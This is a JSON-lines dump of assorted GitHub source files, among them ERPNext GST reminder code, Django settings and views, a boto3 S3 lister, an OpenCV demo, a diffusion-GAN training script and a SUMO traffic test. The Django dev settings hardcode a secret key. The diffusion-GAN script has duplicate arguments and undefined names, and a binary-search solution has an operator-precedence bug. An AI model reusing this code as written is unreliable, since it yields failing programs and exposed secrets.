tabAddress where country = \"India\"'''\n\t\t)\n\t\tdata.total_addresses_with_gstin = frappe.db.sql(\n\t\t\t\"\"\"select distinct count(*)\n\t\t\tfrom tabAddress where country = \"India\" and ifnull(gstin, '')!='' \"\"\"\n\t\t)\n\t\tself.set_onload(\"data\", data)\n\n\tdef validate(self):\n\t\t# Validate duplicate accounts\n\t\tself.validate_duplicate_accounts()\n\n\tdef validate_duplicate_accounts(self):\n\t\taccount_list = []\n\t\tfor account in self.get(\"gst_accounts\"):\n\t\t\tfor fieldname in [\"cgst_account\", \"sgst_account\", \"igst_account\", \"cess_account\"]:\n\t\t\t\tif account.get(fieldname) in account_list:\n\t\t\t\t\tfrappe.throw(\n\t\t\t\t\t\t_(\"Account {0} appears multiple times\").format(frappe.bold(account.get(fieldname)))\n\t\t\t\t\t)\n\n\t\t\t\tif account.get(fieldname):\n\t\t\t\t\taccount_list.append(account.get(fieldname))\n\n\n@frappe.whitelist()\ndef send_reminder():\n\tfrappe.has_permission(\"GST Settings\", throw=True)\n\n\tlast_sent = frappe.db.get_single_value(\"GST Settings\", \"gstin_email_sent_on\")\n\tif last_sent and date_diff(nowdate(), last_sent) < 3:\n\t\tfrappe.throw(_(\"Please wait 3 days before resending the reminder.\"))\n\n\tfrappe.db.set_value(\"GST Settings\", \"GST Settings\", \"gstin_email_sent_on\", nowdate())\n\n\t# enqueue if large number of customers, suppliser\n\tfrappe.enqueue(\n\t\t\"erpnext.regional.doctype.gst_settings.gst_settings.send_gstin_reminder_to_all_parties\"\n\t)\n\tfrappe.msgprint(_(\"Email Reminders will be sent to all parties with email contacts\"))\n\n\ndef send_gstin_reminder_to_all_parties():\n\tparties = []\n\tfor address_name in frappe.db.sql(\n\t\t\"\"\"select name\n\t\tfrom tabAddress where country = \"India\" and ifnull(gstin, '')='' \"\"\"\n\t):\n\t\taddress = frappe.get_doc(\"Address\", address_name[0])\n\t\tfor link in address.links:\n\t\t\tparty = frappe.get_doc(link.link_doctype, link.link_name)\n\t\t\tif link.link_doctype in (\"Customer\", \"Supplier\"):\n\t\t\t\tt = (link.link_doctype, link.link_name, address.email_id)\n\t\t\t\tif not t in parties:\n\t\t\t\t\tparties.append(t)\n\n\tsent_to = []\n\tfor party in parties:\n\t\t# get email from default contact\n\t\ttry:\n\t\t\temail_id = _send_gstin_reminder(party[0], party[1], 
party[2], sent_to)\n\t\t\tsent_to.append(email_id)\n\t\texcept EmailMissing:\n\t\t\tpass\n\n\n@frappe.whitelist()\ndef send_gstin_reminder(party_type, party):\n\t\"\"\"Send GSTIN reminder to one party (called from Customer, Supplier form)\"\"\"\n\tfrappe.has_permission(party_type, throw=True)\n\temail = _send_gstin_reminder(party_type, party)\n\tif email:\n\t\tfrappe.msgprint(_(\"Reminder to update GSTIN Sent\"), title=\"Reminder sent\", indicator=\"green\")\n\n\ndef _send_gstin_reminder(party_type, party, default_email_id=None, sent_to=None):\n\t\"\"\"Send GST Reminder email\"\"\"\n\temail_id = frappe.db.get_value(\"Contact\", get_default_contact(party_type, party), \"email_id\")\n\tif not email_id:\n\t\t# get email from address\n\t\temail_id = default_email_id\n\n\tif not email_id:\n\t\tfrappe.throw(_(\"Email not found in default contact\"), exc=EmailMissing)\n\n\tif sent_to and email_id in sent_to:\n\t\treturn\n\n\tfrappe.sendmail(\n\t\tsubject=\"Please update your GSTIN\",\n\t\trecipients=email_id,\n\t\tmessage=\"\"\"\n\t\t
Hello,\n\t\t<br><br>\n\t\tPlease help us send you GST Ready Invoices.\n\t\t<br><br>\n\t\t<a href=\"{0}?party={1}\">\n\t\t\tClick here to update your GSTIN Number in our system\n\t\t</a>\n\t\t<br><br>\n\t\tGet your GST Ready ERP system at https://erpnext.com\n\t\t<br>\n\t\tERPNext is a free and open source ERP system.
    \n\t\t\"\"\".format(\n\t\t\tos.path.join(get_url(), \"/regional/india/update-gstin\"), party\n\t\t),\n\t)\n\n\treturn email_id\n\n\n@frappe.whitelist()\ndef update_hsn_codes():\n\tfrappe.enqueue(enqueue_update)\n\tfrappe.msgprint(_(\"HSN/SAC Code sync started, this may take a few minutes...\"))\n\n\ndef enqueue_update():\n\twith open(os.path.join(os.path.dirname(__file__), \"hsn_code_data.json\"), \"r\") as f:\n\t\thsn_codes = json.loads(f.read())\n\n\tfor hsn_code in hsn_codes:\n\t\ttry:\n\t\t\thsn_code_doc = frappe.get_doc(\"GST HSN Code\", hsn_code.get(\"hsn_code\"))\n\t\t\thsn_code_doc.set(\"gst_rates\", [])\n\t\t\tfor rate in hsn_code.get(\"gst_rates\"):\n\t\t\t\thsn_code_doc.append(\n\t\t\t\t\t\"gst_rates\",\n\t\t\t\t\t{\n\t\t\t\t\t\t\"minimum_taxable_value\": flt(hsn_code.get(\"minimum_taxable_value\")),\n\t\t\t\t\t\t\"tax_rate\": flt(rate.get(\"tax_rate\")),\n\t\t\t\t\t},\n\t\t\t\t)\n\n\t\t\thsn_code_doc.save()\n\t\texcept Exception as e:\n\t\t\tpass\n","repo_name":"RafMo20D/erpnext-ksa-op","sub_path":"erpnext/regional/doctype/gst_settings/gst_settings.py","file_name":"gst_settings.py","file_ext":"py","file_size_in_byte":4622,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"41417420810","text":"import os\nimport sys\nfrom .base import *\n\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '+=%r&tifrvtste5)88zzq#4#qsq5u$xu=ptuu)1xh)huy$$d&#'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\n# wq: Determine if we are running off django's testing server\nDEBUG_WITH_RUNSERVER = 'manage.py' in sys.argv[0]\n\n\nif DEBUG_WITH_RUNSERVER:\n STATICFILES_DIRS = [\n os.path.join(BASE_DIR, 'app', 'build', 'static')\n ]\n\n\nALLOWED_HOSTS = []\n\n# Database\n# https://docs.djangoproject.com/en/2.0/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n # To enable GeoDjango:\n # 'ENGINE': 'django.contrib.gis.db.backends.spatialite',\n 'NAME': os.path.join(BASE_DIR, 'conf', 'testproject.sqlite3'),\n }\n}\n\n# SPATIALITE_LIBRARY_PATH = 'mod_spatialite.so'\n","repo_name":"fccoelho/optrix","sub_path":"db/optrix/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25332251166","text":"\"\"\"\nTests on the repository activation/deactivation functions\n\"\"\"\n\nfrom octopus.modules.es.testindex import ESTestCase\nfrom service import control, models\nimport time\n\nclass TestModels(ESTestCase):\n def setUp(self):\n super(TestModels, self).setUp()\n\n def tearDown(self):\n super(TestModels, self).tearDown()\n\n def test_01_activate_deactivate(self):\n # first, activation should create a status if none exists\n control.activate_deposit(\"123456789\")\n\n time.sleep(2)\n\n rs = models.RepositoryStatus.pull(\"123456789\")\n assert rs is not None\n assert rs.status == \"succeeding\"\n\n # now deactivate that account\n control.deactivate_deposit(\"123456789\")\n\n time.sleep(2)\n\n rs = models.RepositoryStatus.pull(\"123456789\")\n assert rs is not None\n assert rs.status == \"failing\"\n\n # now re-activate that account\n control.activate_deposit(\"123456789\")\n\n time.sleep(2)\n\n rs = models.RepositoryStatus.pull(\"123456789\")\n assert rs is not None\n assert rs.status == 
\"succeeding\"\n\n\n","repo_name":"JiscPER/jper-sword-out","sub_path":"service/tests/unit/test_control.py","file_name":"test_control.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70140123434","text":"from django.shortcuts import render,redirect\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse\nfrom lessonsApp.models import Lessons\nfrom coursesApp.models import Courses\nfrom django.contrib.auth.models import User\nfrom .forms import LessonsForm\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\nfrom django.views.generic.edit import UpdateView\nfrom django.views.generic.edit import DeleteView\n\n\n@login_required(login_url='login')\ndef lessons(request):\n cid=request.GET['cid']\n course=Courses.objects.get(pk=cid)\n lessons=Lessons.objects.filter(course=course)\n context={'course':course,'lessons':lessons}\t\t\n return render(request,'lessonsApp/lessons_list.html',context)\n\n\n@login_required(login_url='login')\n\ndef createLesson(request):\n\tif request.method=='GET':\n\t\tif 'cid' in request.GET:\n\t\t\tcid=request.GET['cid']\n\t\t\tcourse=Courses.objects.get(pk=cid)\n\t\t\tform=LessonsForm()\n\t\t\tcontext={'course':course,'form':form}\t\n\t\t\treturn render(request,'lessonsApp/lessons_create.html',context)\n\t\treturn HttpResponse(status=404)\n\t\t\t\n\tif request.method=='POST':\n\t\tif 'cid' in request.POST:\n\t\t\tcid=request.POST.get('cid')\n\t\t\tcourse=Courses.objects.get(pk=cid)\n\t\t\tform=LessonsForm(request.POST,request.FILES)\n\t\t\tif form.is_valid():\n\t\t\t\tlesson=form.save(commit=False)\n\t\t\t\tlesson.course=course\n\t\t\t\tlesson.save()\n\t\t\t\treturn redirect('/lessons/?cid='+cid)\t\t\t\t\n\t\treturn HttpResponse(status=400)\t\n\n@method_decorator(login_required(login_url='/users/'), name='dispatch')\t\nclass LessonsUpdateView(UpdateView):\n\n\tmodel=Lessons\n\tform_class=LessonsForm\n\ttemplate_name_suffix = '_update_form'\n\tsuccess_url='/'\n\n\tdef get_object(self):\n\t\tid=self.kwargs.get(\"id\")\n\t\tcid=self.kwargs.get(\"cid\")\n\t\tself.success_url='/lessons/?cid='+str(cid)\n\t\treturn get_object_or_404(Lessons,id=id)\t\t\n\n@method_decorator(login_required(login_url='/users/'), name='dispatch')\nclass LessonsDeleteView(DeleteView):\n\tmodel=Lessons\n\ttemplate_name_suffix = '_delete'\n\tsuccess_url='/'\n\n\tdef get_object(self):\n\t\tid=self.kwargs.get(\"id\")\n\t\tcid=self.kwargs.get(\"cid\")\n\t\tself.success_url='/lessons/?cid='+str(cid)\n\t\treturn get_object_or_404(Lessons,id=id)\n","repo_name":"glen-s-abraham/Elearning-platform","sub_path":"lessonsApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33340814261","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n hayLen = len(haystack)\n needleLen = len(needle)\n if needleLen == 0:\n return 0\n elif needleLen > hayLen:\n return -1\n left = 0\n right = needleLen\n while right <= hayLen:\n if haystack[left:right] == needle:\n return left\n else:\n left += 1\n right += 1\n return 
-1","repo_name":"natitedros/Competitive-Programming","sub_path":"String/ImplementStrStr.py","file_name":"ImplementStrStr.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13211877638","text":"#!/usr/bin/env python3\n\nimport boto3\nimport json\n\ndef main():\n print(\"<---START--->\")\n\n s3Client = boto3.client(\"s3\")\n\n # bucketsFile = open(\"./files/open_buckets_dev.txt\", \"r\")\n # bucketsNames = bucketsFile.readlines()\n\n response = s3Client.list_buckets()\n\n for bucket in response['Buckets']:\n bucketName = bucket[\"Name\"]\n\n print(f\"==> Evaluating Bucket: {bucketName}\")\n\n if bucketName.find(\"-artifacts\") != -1:\n #example bucketName = 064530618445-hayday-update-to-base-artifacts\n\n tokens = bucketName.split(\"-\")\n accNo = tokens[0]\n gameName = tokens[1]\n\n tokens = bucketName.split(\"-artifacts\")\n tmpString = tokens[0]\n\n tokens = tmpString.split(f\"{accNo}-{gameName}-\")\n\n branchName = tokens[1]\n\n print(f\"GameName={gameName}, BranchName={branchName}\")\n\n print(\"\")\n\n print(\"<--FINISH-->\")\n\nmain()\n","repo_name":"vjkancherla/Python-Examples","sub_path":"py3_boto3/08-S3ListAndSplitName.py","file_name":"08-S3ListAndSplitName.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71520918314","text":"from __future__ import annotations\n\nimport uuid\nfrom datetime import datetime, timedelta\nfrom traceback import format_exc\nfrom typing import List, Optional\n\nfrom django.db import models\n\n\nclass Lexer(models.Model):\n name = models.CharField(max_length=225)\n\n @classmethod\n def get_object_by_id(cls, pk: int) -> Optional[Lexer]:\n result = cls.objects.all().filter(pk=pk) # noqa\n return result[0] if len(result) > 0 else None\n\n @classmethod\n def get_object_by_name(cls, name: str) -> Optional[Lexer]:\n result = cls.objects.all().filter(name=name) # noqa\n return result[0] if len(result) > 0 else None\n\n @classmethod\n def get_lexers_as_list(cls) -> List[Lexer]:\n return list(cls.objects.all()) # noqa\n\n @classmethod\n def create_lexer(cls, name: str) -> Optional[Paste]:\n try:\n lexer = cls.objects.create(name=name) # noqa\n return lexer\n\n except Exception as e_info:\n print(e_info)\n return None\n\n\nclass Paste(models.Model):\n lex = models.ForeignKey(Lexer, on_delete=models.CASCADE, null=False)\n name = models.CharField(max_length=255, default=\"Text snippet\")\n uuid = models.CharField(max_length=255)\n content = models.TextField(default=\"\")\n inspiration_date = models.DateField()\n\n @classmethod\n def get_object(cls, unique_id: int) -> Optional[Paste]:\n result = cls.objects.all().filter(uuid=unique_id) # noqa\n return result[0] if len(result) > 0 else None\n\n @classmethod\n def get_paste_by_uuid_as_list(cls, unique_id: int) -> List[Paste]:\n return cls.objects.all().filter(uuid=unique_id) # noqa\n\n @classmethod\n def create_paste(\n cls,\n lex_id: int,\n content: str,\n inspiration_date: datetime,\n name: str = \"Text snippet\",\n ) -> Optional[Paste]:\n try:\n if inspiration_date == 0:\n paste = cls.objects.create( # noqa\n lex_id=lex_id,\n name=name,\n content=content,\n inspiration_date=datetime.now() + timedelta(days=7),\n uuid=str(uuid.uuid1()),\n )\n return paste\n\n paste = cls.objects.create( # noqa\n lex_id=lex_id,\n name=name,\n content=content,\n uuid=str(uuid.uuid1()),\n inspiration_date=inspiration_date,\n )\n 
return paste\n\n except Exception:\n print(format_exc())\n return None\n","repo_name":"Kel0/share_gist","sub_path":"backend/share/paste/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34823550330","text":"import cv2\nimport time\nprint(cv2.__version__)\nwidth=640\nheight=360\nmyRadius = 25\ncircleThickness = 2 \nblackColor = (0,0,0)\ngreenColor = (0,255,0)\nblueColor = (255,0,0)\nfps = 30\nmyText = 'Viktor is Boss'\nnumFrames = 0\ncam=cv2.VideoCapture(0,cv2.CAP_DSHOW)\ncam.set(cv2.CAP_PROP_FRAME_WIDTH, width)\ncam.set(cv2.CAP_PROP_FRAME_HEIGHT,height)\ncam.set(cv2.CAP_PROP_FPS, fps)\ncam.set(cv2.CAP_PROP_FOURCC,cv2.VideoWriter_fourcc(*'MJPG'))\nwhile True:\n ignore, frame = cam.read()\n frame[140:220,250:390] = blueColor\n cv2.rectangle(frame,(250,140),(390,220),color = greenColor, thickness = 4)\n cv2.circle(frame,(width//2,height//2),radius = myRadius,color = blackColor, thickness= circleThickness)\n #cv2.putText(frame,myText,org = (120,60),fontFace= cv2.FONT_HERSHEY_COMPLEX,fontScale = 2.5,color =blueColor,thickness = 2)\n numFrames = numFrames + 1\n cv2.putText(frame,str(numFrames),org = (0,60),fontFace= cv2.FONT_HERSHEY_COMPLEX,fontScale = 2.5,color =blackColor,thickness = 2)\n cv2.imshow('my WEBcam', frame)\n cv2.moveWindow('my WEBcam',0,0)\n if cv2.waitKey(1) & 0xff ==ord('q'):\n break\ncam.release()","repo_name":"VikThor997/Hobby","sub_path":"OpenCVPython/openCV-7.py","file_name":"openCV-7.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70539116393","text":"# 문제 : https://www.acmicpc.net/problem/2110\n\nimport sys\ninput = sys.stdin.readline\n\nn, c = map(int, input().split())\nhome = [int(input()) for _ in range(n)]\nhome.sort()\n\nstart = home[0]\nend = home[-1] - home[0]\n\nwhile start < end:\n mid = start + end // 2\n tmp = home[0]\n count = 1\n\n for i in range(1, len(home)):\n if home[i] >= mid + tmp:\n count += 1\n tmp = home[i]\n\n if count >= c:\n start = mid + 1\n else:\n end = mid - 1\nprint(mid)","repo_name":"fbghgus123/algorithm","sub_path":"python/백준/이분탐색/2110_공유기설치.py","file_name":"2110_공유기설치.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34294158238","text":"def factorial(n):\n if n < 1:\n return None\n \n factorial = 1\n for value in range(1,n+1): \n factorial*=value \n return factorial\n \n\ndef smart_factorial(n):\n if n == 1: # The base case (termination condition.)\n return 1\n else:\n return n * factorial(n - 1) #n-- until 1 \n\n\n\nfor n in range(1, 10):\n print(n, \"->\", factorial(n))\n","repo_name":"sostenuto95/codepractice","sub_path":"Python/my_factorial.py","file_name":"my_factorial.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3795992623","text":"# ---------------------------------------------------------------\r\n# Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.\r\n#\r\n# This work is licensed under the NVIDIA Source Code License\r\n# for Denoising Diffusion GAN. 
To view a copy of this license, see the LICENSE file.\r\n# ---------------------------------------------------------------\r\n\r\n\r\nimport argparse\r\nimport torch\r\nimport numpy as np\r\nimport rawpy\r\nimport os\r\n\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport torchvision\r\n\r\nimport torchvision.transforms as transforms\r\nfrom torchvision.datasets import CIFAR10\r\nfrom datasets_prep.lsun import LSUN\r\nfrom datasets_prep.stackmnist_data import StackedMNIST, _data_transforms_stacked_mnist\r\nfrom datasets_prep.lmdb_datasets import LMDBDataset\r\n\r\nfrom network import Network\r\n\r\nfrom torch.multiprocessing import Process\r\nimport torch.distributed as dist\r\nimport shutil\r\n\r\ndef init_processes(rank, size, fn, args):\r\n \"\"\" Initialize the distributed environment. \"\"\"\r\n os.environ['MASTER_ADDR'] = args.master_address\r\n os.environ['MASTER_PORT'] = '6020'\r\n torch.cuda.set_device(args.local_rank)\r\n gpu = args.local_rank\r\n dist.init_process_group(backend='nccl', init_method='env://', rank=rank, world_size=size)\r\n fn(rank, gpu, args)\r\n dist.barrier()\r\n cleanup() \r\n\r\ndef cleanup():\r\n dist.destroy_process_group() \r\n#%%\r\nif __name__ == '__main__':\r\n opt = argparse.ArgumentParser('ddgan parameters')\r\n opt.add_argument('--seed', type=int, default=1024,\r\n help='seed used for initialization')\r\n \r\n opt.add_argument('--resume', action='store_true',default=False)\r\n \r\n opt.add_argument('--image_size', type=int, default=32,\r\n help='size of image')\r\n opt.add_argument('--num_channels', type=int, default=4,\r\n help='channel of image')\r\n opt.add_argument('--centered', action='store_false', default=True,\r\n help='-1,1 scale')\r\n opt.add_argument('--use_geometric', action='store_true',default=False)\r\n opt.add_argument('--beta_min', type=float, default= 0.1,\r\n help='beta_min for diffusion')\r\n opt.add_argument('--beta_max', type=float, default=20.,\r\n help='beta_max for diffusion')\r\n \r\n \r\n opt.add_argument('--num_channels_dae', type=int, default=128,\r\n help='number of initial channels in denosing model')\r\n opt.add_argument('--n_mlp', type=int, default=3,\r\n help='number of mlp layers for z')\r\n opt.add_argument('--ch_mult', nargs='+', type=int,\r\n help='channel multiplier')\r\n opt.add_argument('--num_res_blocks', type=int, default=2,\r\n help='number of resnet blocks per scale')\r\n opt.add_argument('--attn_resolutions', default=(16,),\r\n help='resolution of applying attention')\r\n opt.add_argument('--dropout', type=float, default=0.,\r\n help='drop-out rate')\r\n opt.add_argument('--resamp_with_conv', action='store_false', default=True,\r\n help='always up/down sampling with conv')\r\n opt.add_argument('--conditional', action='store_false', default=True,\r\n help='noise conditional')\r\n opt.add_argument('--fir', action='store_false', default=True,\r\n help='FIR')\r\n opt.add_argument('--fir_kernel', default=[1, 3, 3, 1],\r\n help='FIR kernel')\r\n opt.add_argument('--skip_rescale', action='store_false', default=True,\r\n help='skip rescale')\r\n opt.add_argument('--resblock_type', default='biggan',\r\n help='tyle of resnet block, choice in biggan and ddpm')\r\n opt.add_argument('--progressive', type=str, default='none', choices=['none', 'output_skip', 'residual'],\r\n help='progressive type for output')\r\n opt.add_argument('--progressive_input', type=str, default='residual', choices=['none', 'input_skip', 'residual'],\r\n help='progressive type for input')\r\n 
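# NB: the progressive input/output options here follow the NCSN++ (score-SDE) generator backbone that DDGAN reuses\r\n    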
opt.add_argument('--progressive_combine', type=str, default='sum', choices=['sum', 'cat'],\r\n help='progressive combine method.')\r\n \r\n opt.add_argument('--embedding_type', type=str, default='positional', choices=['positional', 'fourier'],\r\n help='type of time embedding')\r\n opt.add_argument('--fourier_scale', type=float, default=16.,\r\n help='scale of fourier transform')\r\n opt.add_argument('--not_use_tanh', action='store_true',default=False)\r\n \r\n #geenrator and training\r\n opt.add_argument('--exp', default='experiment_cifar_default', help='name of experiment')\r\n opt.add_argument('--dataset', default='cifar10', help='name of dataset')\r\n opt.add_argument('--nz', type=int, default=100)\r\n opt.add_argument('--num_timesteps', type=int, default=4)\r\n\r\n opt.add_argument('--z_emb_dim', type=int, default=256)\r\n opt.add_argument('--t_emb_dim', type=int, default=256)\r\n opt.add_argument('--batch_size', type=int, default=128, help='input batch size')\r\n opt.add_argument('--num_epoch', type=int, default=1200)\r\n opt.add_argument('--ngf', type=int, default=64)\r\n\r\n opt.add_argument('--lr_g', type=float, default=1.5e-4, help='learning rate g')\r\n opt.add_argument('--lr_d', type=float, default=1e-4, help='learning rate d')\r\n opt.add_argument('--beta1', type=float, default=0.5,\r\n help='beta1 for adam')\r\n opt.add_argument('--beta2', type=float, default=0.9,\r\n help='beta2 for adam')\r\n opt.add_argument('--no_lr_decay',action='store_true', default=False)\r\n \r\n opt.add_argument('--use_ema', action='store_true', default=False,\r\n help='use EMA or not')\r\n opt.add_argument('--ema_decay', type=float, default=0.9999, help='decay rate for EMA')\r\n \r\n opt.add_argument('--r1_gamma', type=float, default=0.05, help='coef for r1 reg')\r\n opt.add_argument('--lazy_reg', type=int, default=None,\r\n help='lazy regulariation.')\r\n\r\n opt.add_argument('--save_content', action='store_true',default=False)\r\n opt.add_argument('--save_content_every', type=int, default=50, help='save content for resuming every x epochs')\r\n opt.add_argument('--save_ckpt_every', type=int, default=25, help='save ckpt every x epochs')\r\n \r\n ###ddp\r\n opt.add_argument('--num_proc_node', type=int, default=1,\r\n help='The number of nodes in multi node env.')\r\n opt.add_argument('--num_process_per_node', type=int, default=1,\r\n help='number of gpus')\r\n opt.add_argument('--node_rank', type=int, default=0,\r\n help='The index of node.')\r\n opt.add_argument('--local_rank', type=int, default=0,\r\n help='rank of process in the node')\r\n opt.add_argument('--master_address', type=str, default='127.0.0.1',\r\n help='address for master')\r\n opt.add_argument('--adaptive_loss', action=\"store_true\", help='whether to use a learned weight of loss for different stages')\r\n opt.add_argument('--name', type=str, default=None, help='name of the experiment. It decides where to store samples and models')\r\n opt.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')\r\n opt.add_argument('--model', type=str, default='eld_model', help='chooses which model to use.', choices=model_names)\r\n opt.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here')\r\n opt.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\r\n opt.add_argument('--resume_epoch', '-re', type=int, default=None, help='checkpoint to use. 
(default: latest')\r\n opt.add_argument('--seed', type=int, default=2018, help='random seed to use. Default=2018')\r\n\r\n # for setting input\r\n opt.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')\r\n opt.add_argument('--nThreads', default=8, type=int, help='# threads for loading data')\r\n opt.add_argument('--chop', action='store_true', help='enable forward_chop')\r\n\r\n # for display\r\n opt.add_argument('--no-log', action='store_true', help='disable tf logger?')\r\n opt.add_argument('--no-verbose', action='store_true', help='disable verbose info?')\r\n opt.add_argument('--debug', action='store_true', help='debugging mode')\r\n\r\n opt.add_argument('--iter_num', type=int, default=2)\r\n opt.add_argument('--netG', type=str, default='unet', help='chooses which architecture to use for netG.')\r\n opt.add_argument('--adaptive_res_and_x0', action=\"store_true\", help='adaptively combine the clean image and the image removed noise')\r\n opt.add_argument('--with_photon', action=\"store_true\")\r\n opt.add_argument('--concat_origin', action=\"store_true\")\r\n \r\n opt.add_argument('--resid', action=\"store_true\", help='predict the noise instead of the clean image')\r\n opt.add_argument('--channels', '-c', type=int, default=4, help='in/out channels (4: bayer; 9: xtrans')\r\n opt.add_argument('--stage_in', type=str, default='raw', help='input stage [raw|srgb]')\r\n opt.add_argument('--stage_out', type=str, default='raw', help='output stage [raw|srgb]')\r\n opt.add_argument('--stage_eval', type=str, default='raw', help='output stage [raw|srgb]')\r\n opt.add_argument('--model_path', type=str, default=None, help='model checkpoint to use.')\r\n opt.add_argument('--include', type=int, default=None, help='select camera in ELD dataset')\r\n opt.add_argument('--gt_wb', action='store_true', help='use white balance of ground truth')\r\n opt.add_argument('--crf', action='store_true', help='use CRF to render sRGB images')\r\n opt.add_argument('--epoch', type=int, default=200)\r\n \r\n opt = opt.parse_args()\r\n opt.world_size = opt.num_proc_node * opt.num_process_per_node\r\n size = opt.num_process_per_node\r\n opt.display_freq = 20\r\n opt.print_freq = 20\r\n opt.nEpochs = 40\r\n opt.max_dataset_size = 100\r\n opt.no_log = False\r\n opt.nThreads = 0\r\n opt.decay_iter = 0\r\n opt.serial_batches = True\r\n opt.no_flip = True\r\n if size > 1:\r\n processes = []\r\n for rank in range(size):\r\n opt.local_rank = rank\r\n global_rank = rank + opt.node_rank * opt.num_process_per_node\r\n global_size = opt.num_proc_node * opt.num_process_per_node\r\n opt.global_rank = global_rank\r\n print('Node rank %d, local proc %d, global proc %d' % (opt.node_rank, rank, global_rank))\r\n p = Process(target=init_processes, args=(global_rank, global_size, train, opt))\r\n p.start()\r\n processes.append(p)\r\n \r\n for p in processes:\r\n p.join()\r\n else:\r\n print('starting in debug mode')\r\n \r\n init_processes(0, size, train, opt)\r\n \r\n ","repo_name":"mm2319/Test","sub_path":"denoising-diffusion-gan/train_ddgan.py","file_name":"train_ddgan.py","file_ext":"py","file_size_in_byte":11224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10479233246","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nfrom shutil import copyfile\n\nfrom testing_simulation import Simulation\nfrom 
generator import TrafficGenerator\nfrom model import TestModel\nfrom visualization import Visualization\nfrom utils import import_test_configuration, set_sumo, set_test_path\n\n\nfrom random import randrange\nimport statistics\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n\n config = import_test_configuration(config_file=os.path.join(os.getcwd(),\"PCD_Traffic_Light_Control\",\"DDQN\",'testing_settings.ini'))\n sumo_cmd = set_sumo(config['gui'], config['sumocfg_file_name'], config['max_steps'])\n model_path, plot_path = set_test_path(config['models_path_name'], config['model_to_test'])\n\n Model = TestModel(\n input_dim=config['num_states'],\n model_path=model_path\n )\n\n TrafficGen = TrafficGenerator(\n config['max_steps'], \n config['n_cars_generated'],\n config['art_queue'],\n None\n )\n #None or \"NS\" or \"EW\"\n\n Visualization = Visualization(\n plot_path, \n dpi=96\n )\n \n Simulation = Simulation(\n Model,\n TrafficGen,\n sumo_cmd,\n config['max_steps'],\n config['green_duration'],\n config['yellow_duration'],\n config['num_cells'],\n config['num_states'],\n config['num_actions'],\n config['n_cars_generated'],\n config['static_traffic_lights'] #STL or NOT\n )\n \n reward=0 #reward\n episode = 0 #episode number\n ql=[] #queue length vector for 5 episodes\n awt=[] #average waiting time per vehicle vector for 5 episodes\n total_testing_simulation_time=0\n\n #seed = [i + config['episode_seed'] for i in [1, 2, 3, 4, 5]] could have used it\n\n cuts = [0]\n\n\n #seed = [randrange(5, 100000) for i in range(0,5)] #seeds for reproducibility\n seed = [45715, 92490, 80265, 3957, 40983]\n while episode < 5:\n print('\\n----- Test episode n°', episode)\n simulation_time = Simulation.run(seed[episode])\n print('Simulation time:', simulation_time, 's')\n \n total_testing_simulation_time += simulation_time\n reward+=Simulation._sum_neg_reward \n ql.append(Simulation._sum_queue_length)\n awt.append(Simulation._sum_queue_length/sum(Simulation._waits))\n episode += 1\n \n cuts.append(len(Simulation.reward_episode))\n\n\n print('\\n----- Testing finished -----')\n print('Total testing simulation time:', total_testing_simulation_time, 's')\n avg_reward = reward/5\n twt = sum(ql)/5\n awt = statistics.median(awt)\n\n\n print(\"----- Testing info saved at:\", plot_path)\n copyfile(src='testing_settings.ini', dst=os.path.join(plot_path, 'testing_settings.ini')) #Save to recall the test settings\n \n # print(\"Saved into informations.txt\")\n # f = open(os.path.join(plot_path, \"informations\"), \"a\")\n # f.write(\"\\n----- Total simulation time : \" + str(total_testing_simulation_time))\n # f.write(\"\\n----- nrw : \" + str(avg_reward))\n # f.write(\"\\n----- twt : \" + str(twt))\n # f.write(\"\\n----- awt : \" + str(awt))\n # f.write(\"\\n----- seeds : \" + str(seed))\n # f.write(\"\\n\\n\")\n # f.close()\n\n #Print informations for average episodes\n print('seeds', seed)\n print('nrw', avg_reward)\n print('twt', twt)\n print('awt', awt)\n #print('Action step cuts', cuts)\n\n #The 5 cruve profiles are side by side\n 